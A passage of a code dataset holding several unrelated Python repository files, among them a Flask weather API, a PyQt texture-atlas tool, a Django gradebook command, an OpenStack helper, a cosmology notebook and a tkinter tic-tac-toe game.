jsonify(list_of_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n # Query the last 12 months of temperature observation data for the most active station\n start_date = '2016-08-23'\n sel = [measurement.date, \n measurement.tobs]\n station_temps = session.query(*sel).\\\n filter(measurement.date >= start_date, measurement.station == 'USC00519281').\\\n group_by(measurement.date).\\\n order_by(measurement.date).all()\n\n session.close()\n\n # Return a dictionary with the date as key and the daily temperature observation as value\n dates = []\n temps = []\n\n for date, observation in station_temps:\n dates.append(date)\n temps.append(observation)\n \n most_active_tobs_dict = dict(zip(dates, temps))\n\n return jsonify(most_active_tobs_dict)\n\n@app.route(\"/api/v1.0/trip/\")\ndef trip1(start_date, end_date='2017-08-23'):\n # Calculate minimum, average and maximum temperatures for the range of dates starting with start date.\n # If no end date is provided, the function defaults to 2017-08-23.\n\n session = Session(engine)\n query_result = session.query(func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)).\\\n filter(measurement.date >= start_date).filter(measurement.date <= end_date).all()\n session.close()\n\n trip_stats = []\n for min, avg, max in query_result:\n trip_dict = {}\n trip_dict[\"Min\"] = min\n trip_dict[\"Average\"] = avg\n trip_dict[\"Max\"] = max\n trip_stats.append(trip_dict)\n\n # If the query returned non-null values return the results,\n # otherwise return an error message\n if trip_dict['Min']: \n return jsonify(trip_stats)\n else:\n return jsonify({\"error\": f\"Date {start_date} not found or not formatted as YYYY-MM-DD.\"}), 404\n \n@app.route(\"/api/v1.0/trip//\")\ndef trip2(start_date, end_date='2017-08-23'):\n # Calculate minimum, average and maximum temperatures for the range of dates starting with start date.\n # If no valid end date is provided, the function defaults to 2017-08-23.\n\n session = Session(engine)\n query_result = session.query(func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)).\\\n filter(measurement.date >= start_date).filter(measurement.date <= end_date).all()\n session.close()\n\n trip_stats = []\n for min, avg, max in query_result:\n trip_dict = {}\n trip_dict[\"Min\"] = min\n trip_dict[\"Average\"] = avg\n trip_dict[\"Max\"] = max\n trip_stats.append(trip_dict)\n\n # If the query returned non-null values return the results,\n # otherwise return an error message\n if trip_dict['Min']: \n return jsonify(trip_stats)\n else:\n return jsonify({\"error\": f\"Date(s) not found, invalid date range or dates not formatted correctly.\"}), 404\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"j-fairgrieve-bootcamp/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42940839352","text":"from PyQt5 import QtWidgets, QtCore, QtGui\r\nimport os\r\nimport subprocess\r\nfrom managerPaths import Paths\r\nfrom staticMethods import StaticMethods\r\n\r\nclass Ui_SkinConverter(object):\r\n def __init__(self, win, app):\r\n self.app = app\r\n self.win = win\r\n self.setupUi(win)\r\n win.show()\r\n\r\n self.texturePackerSettings = 'TexturePacker --format phaser-json-hash --png-opt-level 1 --force-squared ' \\\r\n '--max-size 4096 --scale 1 --scale-mode Smooth --algorithm MaxRects ' \\\r\n '--maxrects-heuristics Best --pack-mode Best --trim-mode Trim --pack-normalmaps ' \\\r\n '--normalmap-filter \"/normalmaps/\" --normalmap-suffix \"_n\"'\r\n\r\n def setupUi(self, skinConverter):\r\n skinConverter.resize(350, 200)\r\n skinConverter.setObjectName('skinConverterWindow')\r\n skinConverter.setWindowTitle('skin_converter')\r\n\r\n self.centralwidget = QtWidgets.QWidget(skinConverter)\r\n self.centralwidget.setObjectName('centralwidget')\r\n\r\n self.centralLayout = QtWidgets.QVBoxLayout()\r\n self.centralLayout.setObjectName('centralLayout')\r\n self.centralLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n self.centralLayout.setContentsMargins(20, 20, 20, 20)\r\n\r\n self.selectionWidget = QtWidgets.QWidget(self.centralwidget)\r\n self.selectionWidget.setObjectName('selectionWidget')\r\n\r\n self.selectionLayout = QtWidgets.QHBoxLayout()\r\n self.selectionLayout.setObjectName('selectionLayout')\r\n self.selectionLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n\r\n self.buttonWidget = QtWidgets.QWidget(self.selectionWidget)\r\n self.buttonWidget.setObjectName('buttonWidget')\r\n\r\n self.buttonsLayout = QtWidgets.QVBoxLayout()\r\n self.buttonsLayout.setObjectName('buttonsLayout')\r\n self.buttonsLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n\r\n self.folderLineEdit = QtWidgets.QLineEdit(self.selectionWidget)\r\n self.folderLineEdit.setObjectName('folderLineEdit')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.folderLineEdit.setFont(font)\r\n self.folderLineEdit.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n\r\n self.chooseFolderButton = QtWidgets.QPushButton(self.buttonWidget)\r\n self.chooseFolderButton.setObjectName('chooseFolderButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.chooseFolderButton.setFont(font)\r\n self.chooseFolderButton.setText('Choose\\nDefaultMC')\r\n self.chooseFolderButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.chooseFolderButton.setMinimumHeight(50)\r\n self.chooseFolderButton.clicked.connect(lambda: self.chooseFolder())\r\n\r\n self.clearFolderButton = QtWidgets.QPushButton(self.buttonWidget)\r\n self.clearFolderButton.setObjectName('clearFolderButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.clearFolderButton.setFont(font)\r\n self.clearFolderButton.setText('Clear')\r\n self.clearFolderButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.clearFolderButton.setMinimumHeight(35)\r\n self.clearFolderButton.clicked.connect(lambda: self.clearFolder())\r\n\r\n self.buttonsLayout.addWidget(self.chooseFolderButton, alignment=QtCore.Qt.AlignmentFlag.AlignVCenter)\r\n self.buttonsLayout.addWidget(self.clearFolderButton, alignment=QtCore.Qt.AlignmentFlag.AlignVCenter)\r\n\r\n self.buttonWidget.setLayout(self.buttonsLayout)\r\n\r\n self.selectionLayout.addWidget(self.folderLineEdit, 6, alignment=QtCore.Qt.AlignmentFlag.AlignVCenter)\r\n self.selectionLayout.addWidget(self.buttonWidget, 4)\r\n\r\n self.selectionWidget.setLayout(self.selectionLayout)\r\n\r\n self.mainButtonsWidget = QtWidgets.QWidget(self.centralwidget)\r\n self.mainButtonsWidget.setObjectName('mainButtonsWidget')\r\n\r\n self.mainButtonsLayout = QtWidgets.QHBoxLayout()\r\n self.mainButtonsLayout.setObjectName('mainButtonsLayout')\r\n self.mainButtonsLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n\r\n self.updateAtlasButton = QtWidgets.QPushButton(self.mainButtonsWidget)\r\n self.updateAtlasButton.setObjectName('updateAtlasButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.updateAtlasButton.setFont(font)\r\n self.updateAtlasButton.setText('Update\\natlas')\r\n self.updateAtlasButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.updateAtlasButton.setMinimumSize(150, 50)\r\n self.updateAtlasButton.setEnabled(False)\r\n self.updateAtlasButton.clicked.connect(lambda: self.updateAtlas())\r\n\r\n self.addTexturesButton = QtWidgets.QPushButton(self.mainButtonsWidget)\r\n self.addTexturesButton.setObjectName('addTexturesButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.addTexturesButton.setFont(font)\r\n self.addTexturesButton.setText('Add textures\\nfrom somewhere')\r\n self.addTexturesButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.addTexturesButton.setMinimumSize(150, 50)\r\n self.addTexturesButton.setEnabled(False)\r\n\r\n spacerH1 = QtWidgets.QSpacerItem(50, 40, QtWidgets.QSizePolicy.Policy.Fixed,\r\n QtWidgets.QSizePolicy.Policy.Fixed)\r\n\r\n self.mainButtonsLayout.addWidget(self.updateAtlasButton)\r\n self.mainButtonsLayout.addItem(spacerH1)\r\n self.mainButtonsLayout.addWidget(self.addTexturesButton)\r\n\r\n self.mainButtonsWidget.setLayout(self.mainButtonsLayout)\r\n\r\n self.centralLayout.addWidget(self.selectionWidget)\r\n self.centralLayout.addWidget(self.mainButtonsWidget)\r\n\r\n self.centralwidget.setLayout(self.centralLayout)\r\n\r\n skinConverter.setCentralWidget(self.centralwidget)\r\n\r\n def clearFolder(self):\r\n self.folderLineEdit.clear()\r\n self.currFolder = ''\r\n self.updateAtlasButton.setEnabled(False)\r\n self.folderLineEdit.setEnabled(True)\r\n self.chooseFolderButton.setEnabled(True)\r\n\r\n def chooseFolder(self):\r\n fileDialog = QtWidgets.QFileDialog()\r\n self.currFolder = fileDialog.getExistingDirectory()\r\n self.folderLineEdit.setText(self.currFolder)\r\n self.folderLineEdit.setEnabled(False)\r\n self.updateAtlasButton.setEnabled(True)\r\n self.chooseFolderButton.setEnabled(False)\r\n\r\n def updateAtlas(self):\r\n pathToConverter = os.path.join(Paths.tools, 'minecraft_skin_converter.exe')\r\n pathToSkin = os.path.join(Paths.world, 'skin.dat')\r\n pathToMCAssets = os.path.join(self.currFolder, 'assets')\r\n pathToAtlasPng = os.path.join(Paths.world, 'world.png')\r\n pathToWorldJson = os.path.join(self.currFolder, 'world.json')\r\n pathToTextures = os.path.join(self.currFolder, 'assets', 'minecraft', 'textures', 'block')\r\n\r\n try:\r\n os.remove(pathToSkin)\r\n except FileNotFoundError:\r\n pass\r\n\r\n try:\r\n os.remove(pathToAtlasPng)\r\n except FileNotFoundError:\r\n pass\r\n\r\n try:\r\n os.remove(os.path.join(Paths.world, 'world_n.png'))\r\n except FileNotFoundError:\r\n pass\r\n\r\n\r\n subprocess.call('start /wait ' + self.texturePackerSettings + ' --sheet \"' + pathToAtlasPng +\r\n '\" --data \"' + pathToWorldJson + '\" \"' + pathToTextures + '\"', shell=True, cwd=os.getcwd())\r\n subprocess.call('start /wait ' + pathToConverter + ' ' + pathToSkin + ' ' + pathToMCAssets + ' ' + pathToWorldJson,\r\n shell=True)\r\n\r\n messageBox = QtWidgets.QMessageBox()\r\n messageBox.setIcon(QtWidgets.QMessageBox.Information)\r\n messageBox.setText(\"Info\")\r\n messageBox.setInformativeText('Files world.png, world_n.png, skin.dat have successfully converted in \"world\" directory.')\r\n messageBox.setWindowTitle(\"Info\")\r\n messageBox.exec_()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n mainWindow = QtWidgets.QMainWindow()\r\n Paths.getDir('Release')\r\n Ui_SkinConverter(mainWindow, app)\r\n mainWindow.show()\r\n sys.exit(app.exec_())","repo_name":"AntonElkin1996/assets_manager","sub_path":"skinConverter.py","file_name":"skinConverter.py","file_ext":"py","file_size_in_byte":9028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21873534134","text":"from __future__ import print_function, unicode_literals\n\nimport students.utils.find_student\nfrom django.utils.timezone import now\nfrom gradebook.models import Response, Role, Score\nfrom people.models import Person\n\n###############################################################\n\nDJANGO_COMMAND = \"main\"\nUSE_ARGPARSE = True\nOPTION_LIST = (\n ([\"--task-pk\"], {\"help\": \"Restrict to a particular task by primary key\"}),\n ([\"--viewport\"], {\"help\": \"Restrict to a particular viewport by slug\"}),\n (\n [\"--alive\"],\n {\n \"help\": \"Restrict to sections that have at least one active role\",\n \"action\": \"store_true\",\n },\n ),\n ([\"iclicker_id\"], {\"nargs\": \"*\", \"help\": \"i>clicker IDs to rescore\"}),\n)\nHELP_TEXT = \"Rescore i>clicker responses\"\n\n###############################################################\n\n# enable iclicker.com websync:\nstudents.utils.find_student.by_iclicker.use_websync = True\n\n###############################################################\n\n\ndef alive_ledgers(dt=None):\n if dt is None:\n dt = now()\n role_qs = Role.objects.active().filter(\n person__active=True,\n viewport__active=True,\n viewport__ledger__active=True,\n dtstart__lte=dt,\n dtend__gt=dt,\n )\n return set(role_qs.values_list(\"viewport__ledger_id\", flat=True))\n\n\n###############################################################\n\n\ndef print_tabs(*args):\n print(\"\\t\".join([\"{}\".format(a) for a in args]))\n\n\n###############################################################\n\n\ndef main(options, args):\n args = options[\"iclicker_id\"]\n verbosity = int(options[\"verbosity\"])\n task = options[\"task_pk\"]\n # section = options['section']\n viewport = options[\"viewport\"]\n alive = options[\"alive\"]\n\n dtnow = now()\n\n qs = Response.objects.active().filter(\n scored=False, description__startswith=\"i>clicker session \"\n )\n if alive:\n qs = qs.filter(task__ledger_id__in=alive_ledgers(dtnow))\n # if section:\n # qs = qs.filter(task__section__slug=section)\n if viewport:\n qs = qs.filter(task__ledgerviewport__slug=viewport)\n if task:\n qs = qs.filter(task__pk=task)\n if args:\n qs = qs.filter(student_id__in=args)\n iclicker_list = set(qs.values_list(\"student_id\", flat=True))\n for iclicker in iclicker_list:\n # force a websync for registrations that do not exist...\n try:\n students.utils.find_student.by_iclicker(iclicker_id)\n except:\n pass\n task_list = qs.values_list(\"task_id\", flat=True)\n person_list = Person.objects.filter(\n student__iclicker__iclicker_id__in=iclicker_list\n )\n score_list = Score.objects.filter(task__in=task_list, person_id__in=person_list)\n\n # TODO: consider a --force-all-no-really flag which sets\n # ``exclude_iclickers=False``:\n score_list.update_for_recalc()\n if verbosity > 0:\n print(score_list.count(), \"scores set for recalculation\")\n\n\n###############################################################\n","repo_name":"dgabrielson/django-dept-gradebook","sub_path":"gradebook/cli/gb2/iclicker/rescore.py","file_name":"rescore.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70110830187","text":"import requests\nimport os\nfrom data.compute.compute_data import openstack_compute_data\nfrom data.network.network_data import openstack_network_data\nfrom data.terraform_openstack.openstack_terraform import Terraform\n\ndef create_credentials_token(key) :\n print(\"Create Credentials Token\")\n\n data = '{\"auth\": {\"identity\": {\"methods\": [\"password\"],\"password\": {\"user\": {\"id\":\"' + key['OS_ADMIN_ID'] + '\",\"password\":\"' + key['OS_PASSWORD'] + '\"}}},\"scope\": {\"project\": {\"domain\": {\"id\":\"' + key['OS_PROJECT_DOMAIN_ID'] + '\"},\"name\":\"' + key['OS_USERNAME'] + '\"}}}}'\n try:\n res = requests.post(key['OS_AUTH_URL']+':5000/v3/auth/tokens', data=data)\n token = res.headers['X-Subject-token']\n\n except Exception as ex:\n print(ex)\n print(\"Complate Credentials Token\")\n return token\n\n\n\ndef openstack_data_all(key) :\n path = os.path.dirname(os.path.abspath('.')) + \"/data/terraform_openstack/\" \n print(\"GET Openstack All data\")\n OS_TOKEN = create_credentials_token(key)\n print(\"Create terraform openstack provider\")\n Terraform.make_terraform_provider (path + \"compute/\", key, OS_TOKEN)\n Terraform.make_terraform_provider (path + \"network/\", key, OS_TOKEN)\n Terraform.make_terraform_provider (path + \"database/\", key, OS_TOKEN)\n Terraform.make_terraform_provider (path + \"storage/\", key, OS_TOKEN)\n\n print(\"Complete terraform openstack provider\")\n print(\"Get Compute Data\")\n compute = openstack_compute_data(path + \"compute/\",key, OS_TOKEN)\n print(\"Complete Compute Data\")\n print(\"Get Network Data\")\n network = openstack_network_data(path + \"network/\", key, OS_TOKEN)\n print(\"Complete Network Data\")\n \n compute['resources'] += network['resources']\n\n return compute\n\n","repo_name":"ddorahee/openstack_agent","sub_path":"data/openstack_data_manage.py","file_name":"openstack_data_manage.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5040234985","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login', views.signin, name='login'),\n path('books', views.showbooks, name='books'),\n path('signup', views.signup, name='signup'),\n path('signout', views.signout, name='signout'),\n path('book/', views.book, name='book')\n\n]","repo_name":"ghinayazahra/bookreview","sub_path":"bukuku/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8026124294","text":"from pandas import Series\n\n\ndef value_counts(values: Series):\n \"\"\"Value_counts with predictable sort of values that have equal count.\n\n Useful at reducing diffs between consecutive runs of notebooks where value_counts is used.\n \"\"\"\n name = values.name or 0\n\n return (\n values.value_counts()\n .reset_index()\n .sort_values([name, 'index'], ascending=[False, True])\n .set_index('index')\n [name]\n )\n","repo_name":"krassowski/multi-omics-state-of-the-field","sub_path":"helpers/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"8114404810","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nfrom scipy.integrate import odeint\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# In[4]:\n\n\n#Constantes fisicas. Modelo de Scherer F(X)=F0+F2(X-X0)**2. F tiene un minimo en X0\nomega_DE=0.7\nomega_m=1-omega_DE\n\nMpc=1\nh=.7\nm=Mpc/(3.086e22)\neV=1/(0.197e-6*m)\nM_p=2.4e27*eV\nH_0=(100/3e5)*h/Mpc\nrho_c0=3*H_0**2*M_p**2\nG=1/(8*np.pi*M_p**2) #M_p**2=1/(8*pi*G)\nX_0=1\na_ini=1/3e3 #a_eq materia radiacion\ne1_a1=0.0001\ny_ini=np.sqrt(2*(1+ e1_a1/a_ini**3 )*X_0) #y_ini=np.sqrt(2*X_ini)\nX_ini=y_ini**2/2\n#print(e1_a1/a_ini**3)\nF_0=-omega_DE*rho_c0 #\nF_2=omega_m*rho_c0/(4*X_0**2*e1_a1)\nyr=9.467e15*m\nt_uni=13.7e9*yr\nt_eq=10e11*3e8*m\nprint(\"t_uni = \", t_uni)\nprint(\"F_0 = \", F_0)\nprint(\"F_2 = \", F_2)\n\n\n# In[5]:\n\n\nyr\n\n\n# In[6]:\n\n\n#Solucion analitica para X=X(a)\ndef X_analit(a):\n X = X_0*(1+e1_a1/a**3)\n return X\n\n\n# In[7]:\n\n\n#Arreglo para el factor de escala desde la epoca de igualdad materia-radiacion hasta hoy en dia.\na_arreglo=np.linspace(a_ini,1,1000) #a_ini=a_eq\n\n\n# In[8]:\n\n\n#ploteo para X=X(a) analitico desde la epoca de igualdad hasta hoy en dia.\nplt.plot(a_arreglo,X_analit(a_arreglo))\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlabel(\"a\")\nplt.ylabel(\"X(a)\")\nplt.title(\"Solucion analitica para X=X(a) desde la epoca de iguldad hasta hoy\")\n\n\n# In[9]:\n\n\n#Solución analítica para t=t(a)\n#A\ndef ta(a):\n a_eq=a_ini\n A=-8*np.pi*G*F_0/3\n B=32*np.pi*G*F_2*(X_0**2)*e1_a1/3\n \n l1=2*np.log( np.sqrt(A)*a**(3/2) + np.sqrt(A*a**3+B))\n l2=3*np.sqrt(A)\n c=-2*np.log(B)/(3*np.sqrt(A))\n #print(A*a**3,B)\n return l1/l2 + c \n\n\n# In[10]:\n\n\n#ta(1)\n\n\n# In[11]:\n\n\n#Algo interesante es que ta(a_arreglo) da valores negativos\nplt.plot(ta(a_arreglo) ,a_arreglo,'.', label='Solucion analitica para a=a(t) considerando DM & DE') \n\n#plt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\nplt.title(\"Solucion analitica para a=a(t) considerando DM & DE\")\nplt.legend()\nplt.show()\n\n\n# In[40]:\n\n\nt_analitica=ta(a_arreglo)\nplt.plot(t_analitica[:-1] ,(a_arreglo[1:]-a_arreglo[:-1])/(t_analitica[1:]-t_analitica[:-1]), label='Delta(a)/Delta(t) considerando DM & DE') \n\n#plt.xscale(\"log\")\n#plt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\nplt.title(\"Solucion analitica para a=a(t) considerando DM & DE\")\nplt.legend()\nplt.show()\n\n\n# In[13]:\n\n\n#Aqui tambien ta(a_arreglo) da valores negativos\nB=np.sqrt(4*F_2*X_0**2*e1_a1/(3*M_p**2))\nplt.plot(2*a_arreglo**(3/2)/(3*B), a_arreglo, \".\", label=\"a=a(t) analitico para la parte de DM\")\n\nplt.plot(np.log(a_arreglo)/(np.sqrt(-F_0/(3*M_p**2))), a_arreglo, \".\", label=\"a=a(t) anali.para la parte de DE\")\n\n#plt.xscale(\"log\")\n#plt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\n#plt.xlim(-10,10000)\nplt.title(\"Solucion analitica para a=a(t)\")\nplt.legend()\nplt.show()\n\n\n# In[14]:\n\n\nplt.plot(np.log(a_arreglo)/(np.sqrt(-F_0/(3*M_p**2))), a_arreglo, \".\", label=\"a=a(t) para la parte de DE\")\nplt.plot(t_analitica ,a_arreglo,'.', label='Solucion analitica para a=a(t) considerando DM & DE')\n#plt.xscale(\"log\")\n#plt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\n#plt.xlim(-10,10000)\nplt.title(\"Solucion analitica para a=a(t)\")\nplt.legend()\nplt.show()\n\n\n#Algo curiosos es que salen tiempos negativos\n\n\n# In[46]:\n\n\n#Aqui tambien ta(a_arreglo) da valores negativos\nB=np.sqrt(4*F_2*X_0**2*e1_a1/(3*M_p**2))\nplt.plot((2*a_arreglo**(3/2)/(3*k1))/yr,'.' , a_arreglo, label=\"a=a(t) para la parte de Materia\")\nplt.plot((ta(a_arreglo)-t_analitica[0])/yr ,a_arreglo, '.', label='Solucion analitica para a=a(t) considerando DM & DE')\n\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\n#plt.xlim(-10,10000)\nplt.title(\"Solucion analitica para a=a(t)\")\nplt.legend()\nplt.show()\n\n\n# In[16]:\n\n\n#Para el termino de materia\n\nk1=np.sqrt(4*F_2*X_0**2*e1_a1/(3*M_p**2))\n\nxxx=np.log(np.abs(ta(a_arreglo)))\nyyy=np.log(a_arreglo)\ndeltaxxx=xxx[1:]-xxx[:-1]\ndeltayyy=yyy[1:]-yyy[:-1]\nplt.plot(xxx[1:],deltayyy/deltaxxx,\".\", label='pendiente para el termino de materia')\nplt.legend()\nplt.ylim(-5,5)\n\n\n# In[17]:\n\n\n#Para el termino de energia\n#\nxxx=np.abs(ta(a_arreglo))\nyyy=np.log(a_arreglo)\ndeltaxxx=xxx[1:]-xxx[:-1]\ndeltayyy=yyy[1:]-yyy[:-1]\nplt.plot(xxx[1:],deltayyy/deltaxxx,\".\", label='pendiente para el termino de energia')\nplt.ylim(-.5,.5)\nplt.legend()\n\n\n# In[18]:\n\n\n#Solucion analítica de y=y(a), y=phi_punto desde la epoca de igualdad hasta hoy en dia.\ndef y_analit(a):\n return np.sqrt(2*X_analit(a))\n\n\n# In[19]:\n\n\n#Ploteo de y=y(a), y=phi_punto desde la epoca de igualdad hasta hoy en dia.\nplt.plot(a_arreglo,y_analit(a_arreglo), '.', label='solucion y(a) analitica')\nplt.xlabel(\"a\")\nplt.ylabel(\"\\phi(a)\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.title(\"Solucion analitica para y(a)=\\phi_punto(a) desde la epoca de igualdad hasta hoy en dia\")\nplt.legend()\n\n\n# In[20]:\n\n\n#Grafica \\phi=phi(t), ta() no tiene valores positivos\nplt.plot(ta(a_arreglo),y_analit(a_arreglo),'.', label='Solucion analitica para y=y(t)')\nplt.xlabel(\"t\")\nplt.ylabel(\"y(t)\")\n#plt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.title(\"Solucion analitica para y(t)=\\phi_punto(t) desde la epoca de igualdad hasta hoy en dia\")\nplt.legend()\n\n\n# In[21]:\n\n\n#Pediente para y(t)\n#\nxxx=np.abs(ta(a_arreglo))\nyyy=np.log(y_analit(a_arreglo))\ndeltaxxx=xxx[1:]-xxx[:-1]\ndeltayyy=yyy[1:]-yyy[:-1]\nplt.plot(xxx[1:],deltayyy/deltaxxx,\".\", label='pendiete para y(t) analitico')\nplt.ylim(-.5,.5)\n\n\n# In[22]:\n\n\n#La siguiente solucion numerica considera la evolucion de los parametros desde la epoca de \n#igualdad hasta hoy en dia\n\n\n# In[23]:\n\n\n#Solucion numerica para y=\\phi_punto(t)\ndef ec_for_y(y,a):\n l=8*np.pi*G/3\n m=(y**2/2 -X_0)*y\n n=(3*y**2)/2-X_0\n A=m/n\n return -3*np.sqrt(l*(F_2*(3*y**4/4 + y**2*X_0 - X_0**2)-F_0))*A\n\n\n# In[24]:\n\n\n#Solucion numerica para a(t)\ndef ec_for_a(y,a):\n return np.sqrt((8*np.pi*G/3)*(F_2*(3*y**4/4 + y**2*X_0 - X_0**2)-F_0))*a\n\n\n# In[25]:\n\n\n#Sistema de ecuaciones\ndef funcion_vectorial(x,t):\n y,a=x\n eval_1=ec_for_y(y,a)\n eval_2=ec_for_a(y,a)\n return [eval_1,eval_2]\n\n\n# In[26]:\n\n\ncondiciones_iniciales=[y_ini,a_ini] #El factor de escala va desde la epoca de igualdad hasta hoy en dia\n\n\n# In[27]:\n\n\ntn=np.linspace(t_eq,t_uni,100000) #El tiempo va desde la epoca de igualdad hasta hoy en dia\n\n\n# In[28]:\n\n\n#tlog=np.logspace(np.log10(t_eq),np.log10(t_uni),10000) #tiempo logaritmico\n#tlog\n\n\n# In[29]:\n\n\nsol=odeint(funcion_vectorial,condiciones_iniciales,tn)\n\n\n# In[30]:\n\n\n#sol\n\n\n# In[31]:\n\n\n#ploteo para \\phi=\\phi(t)\nplt.plot(tn,sol[:,0], label='Solucion \\phi=\\phi(t) numerica')\nplt.plot(ta(a_arreglo)-t_analitica[0],y_analit(a_arreglo), label='Solucion para y=y(t) analitica ')\n\nplt.xlabel('time')\nplt.ylabel('y(t)')\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.title(\"Solución numerica para y=y(t)\")\nplt.legend()\n#print(sol[:,0])\n\n\n# In[32]:\n\n\n\"\"\"\n#Pediente para y(t) numerico\n#\nXX=tn\nYY=np.log(y_analit(a_arreglo))\ndeltaXX=XX[1:]-XX[:-1]\ndeltaYY=YY[1:]-YY[:-1]\nplt.plot(XX[1:],deltaYY/deltaXX,\".\", label='pendiete para y(t) numerico')\n\"\"\"\n\n\n# In[33]:\n\n\n#ploteo para para a=a(t)\nplt.plot(tn,sol[:,1], '.', label='Solucion numerica para a=a(t)')\nplt.plot(ta(a_arreglo),a_arreglo, '.', label='Solucion analitica para a=a(t)')\nplt.title(\"Solución numérica para a=a(t)\")\n#plt.ylim(0,100)\n#plt.xscale(\"log\") \n#plt.yscale(\"log\")\nplt.xlabel('t')\nplt.ylabel('a(t)')\nplt.legend()\n\n\n# In[34]:\n\n\nplt.plot(sol[:,1],sol[:,0],\"-.\",label=\"Solucion Numerica para y=y(a)\")\nplt.plot(a_arreglo,y_analit(a_arreglo),label=\"Analitica para y=y(a)\")\n\nplt.xlabel('a')\nplt.ylabel('y(a)')\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.legend()\nplt.title(\"Solución numerica para y=y(a)\")\n\n\n# In[35]:\n\n\nanum=sol[:,1]\nynum=sol[:,0]\n\n\n# In[36]:\n\n\ndloga_dt=(np.log(anum[1:])-np.log(anum[:-1]))/(tn[1:]-tn[:-1])\n\n\n# In[37]:\n\n\nplt.plot(anum[1:],dloga_dt,\".\",label='pendiente en ')\nplt.xscale(\"log\") \nplt.yscale(\"log\")\n\n\n# In[38]:\n\n\ndloga_dlogt=(np.log(anum[1:])-np.log(anum[:-1]))/(np.log(tn[1:])-np.log(tn[:-1]))\n\n\n# In[39]:\n\n\nplt.plot(anum[1:],dloga_dlogt,\".\")\nplt.xlim(.01,10)\nplt.xscale(\"log\") \nplt.yscale(\"log\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"joseljimenez/ServicioSocial","sub_path":"K-essencia/Purely Kinetic k essence.py","file_name":"Purely Kinetic k essence.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1743532388","text":"from tkinter import *\nfrom tkinter import messagebox\nimport random\nimport time\n\ntk = Tk()\napp_runimg = True\n\nsize_canas_x = 768\nsize_canas_y = 768\n\n\ndef on_closing():\n global app_runimg\n if messagebox.askokcancel(\"Выход из игры\", \"Хотите выйти из игры\"):\n app_runimg = False\n tk.destroy()\n\n\ntk.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\ntk.title(\" Игра крестики нолики\")\ntk.resizable(0, 0)\ntk.attributes(\"-topmost\", 1)\ncanvas = Canvas(tk, width=size_canas_x, height=size_canas_y,\n bd=0, highlightthickness=0)\ncanvas.pack()\ntk.update()\n\ns_x = 3\ns_y = 3\nstep_x = size_canas_x // s_x\nstep_y = size_canas_y // s_y\n\n\ndef draw_table():\n for i in range(0, s_x + 1):\n 